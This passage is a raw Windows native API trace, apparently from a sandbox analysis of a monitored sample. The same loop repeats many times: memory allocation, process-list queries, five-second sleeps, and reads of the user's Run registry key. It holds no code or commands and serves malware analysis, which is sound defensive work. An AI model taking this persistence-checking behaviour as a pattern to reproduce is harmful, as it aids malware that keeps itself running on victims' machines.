(ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0187.845] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0187.855] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0187.856] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0187.856] NtClose (Handle=0x154) returned 0x0 [0187.856] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0187.856] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.856] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.857] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.857] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0187.859] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0187.859] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0187.873] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0187.873] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0187.873] NtClose (Handle=0x154) returned 0x0 [0187.873] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0187.874] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.874] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.875] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.875] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0187.880] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0187.881] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0187.887] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0187.887] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0187.887] NtClose (Handle=0x154) returned 0x0 [0187.887] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0187.887] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.888] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.888] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.888] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0187.890] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0187.891] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0187.903] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0187.903] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0187.903] NtClose (Handle=0x154) returned 0x0 [0187.903] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0187.903] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.904] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.904] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.904] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0187.906] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0187.907] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0187.918] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0187.918] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0187.918] NtClose (Handle=0x154) returned 0x0 [0187.918] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0187.919] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.919] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.919] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.919] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0187.921] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0187.922] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0187.935] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0187.936] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0187.936] NtClose (Handle=0x154) returned 0x0 [0187.936] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0187.936] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.936] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.937] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.937] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0187.939] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0187.939] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0187.949] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0187.949] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0187.949] NtClose (Handle=0x154) returned 0x0 [0187.949] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0187.950] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.950] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.950] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.950] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0187.952] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0187.952] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0187.965] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0187.965] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0187.965] NtClose (Handle=0x154) returned 0x0 [0187.965] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0187.965] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.966] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.966] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.967] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0187.969] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0187.970] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0187.981] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0187.981] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0187.981] NtClose (Handle=0x154) returned 0x0 [0187.981] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0187.982] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.982] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.982] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.983] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0187.985] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0187.986] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0187.996] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0187.996] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0187.996] NtClose (Handle=0x154) returned 0x0 [0187.996] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0187.996] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.997] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.997] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.998] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.000] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.001] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0188.012] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0188.012] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0188.012] NtClose (Handle=0x154) returned 0x0 [0188.012] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0188.013] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.013] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0188.013] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0188.014] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.016] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.016] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0188.027] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0188.027] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0188.027] NtClose (Handle=0x154) returned 0x0 [0188.027] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0188.028] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.028] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0188.029] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0188.029] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.031] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.031] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0188.043] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0188.043] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0188.043] NtClose (Handle=0x154) returned 0x0 [0188.043] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0188.043] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.044] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0188.044] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0188.045] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.047] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.047] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0188.058] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0188.058] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0188.058] NtClose (Handle=0x154) returned 0x0 [0188.059] 